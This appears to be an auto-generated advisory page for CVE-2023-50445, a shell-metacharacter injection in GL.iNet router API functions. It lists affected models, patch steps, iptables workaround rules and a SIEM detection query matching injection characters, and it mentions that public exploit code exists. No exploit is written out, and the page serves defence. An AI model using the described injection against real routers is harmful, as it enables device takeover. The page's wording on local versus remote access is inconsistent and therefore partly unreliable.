CVE-2023-50445
📋 TL;DR
This CVE describes a shell injection vulnerability in multiple GL.iNet router models that allows local attackers to execute arbitrary code via specific API functions. Attackers can exploit functions in the logread and upgrade modules to run commands with system privileges. All users running affected firmware versions on listed GL.iNet router models are vulnerable.
💻 Affected Systems
- GL.iNet A1300
- AX1800
- AXT1800
- MT3000
- MT2500
- MT6000
- MT1300
- MT300N-V2
- AR750S
- AR750
- AR300M
- B1300
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete device compromise allowing attackers to install persistent backdoors, intercept network traffic, pivot to internal networks, and use the device for further attacks.
Likely Case
Local privilege escalation leading to unauthorized access to router configuration, network monitoring, and potential credential theft.
If Mitigated
Limited impact if proper network segmentation and access controls prevent local attackers from reaching the vulnerable interfaces.
🎯 Exploit Status
Public exploit code exists and requires no authentication. The vulnerability is easily exploitable via crafted API requests.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific patched versions per model
Vendor Advisory: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md
Restart Required: Yes
Instructions:
1. Log into router admin interface. 2. Navigate to System > Firmware Upgrade. 3. Check for available updates. 4. Download and install latest firmware. 5. Reboot router after installation.
🔧 Temporary Workarounds
Disable vulnerable API endpoints
linuxBlock access to the logread and upgrade module API functions via firewall rules
iptables -A INPUT -p tcp --dport 80 -m string --string "logread" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 80 -m string --string "upgrade" --algo bm -j DROP
Restrict web interface access
linuxLimit access to router web interface to trusted IP addresses only
iptables -A INPUT -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
🧯 If You Can't Patch
- Isolate affected routers in separate VLAN with strict access controls
- Implement network monitoring for suspicious API requests to logread and upgrade endpoints
🔍 How to Verify
Check if Vulnerable:
Check firmware version via web interface: System > Status > Firmware Version. Compare against affected versions list.Check Version:
cat /etc/glversion or check web interface at System > StatusVerify Fix Applied:
After updating, verify firmware version is newer than affected versions. Test API endpoints are no longer vulnerable.📡 Detection & Monitoring
Log Indicators:
- Unusual API requests to /cgi-bin/api endpoints with shell metacharacters
- Suspicious commands in system logs originating from web interface
Network Indicators:
- HTTP POST requests to router IP containing shell metacharacters in parameters
- Unusual outbound connections from router after API calls
SIEM Query:
source="router_logs" AND ("logread" OR "upgrade") AND ("|" OR ";" OR "$" OR "`" OR "&&")🔗 References
- http://packetstormsecurity.com/files/176708/GL.iNet-Unauthenticated-Remote-Command-Execution.html
- https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md
- http://packetstormsecurity.com/files/176708/GL.iNet-Unauthenticated-Remote-Command-Execution.html
- https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md
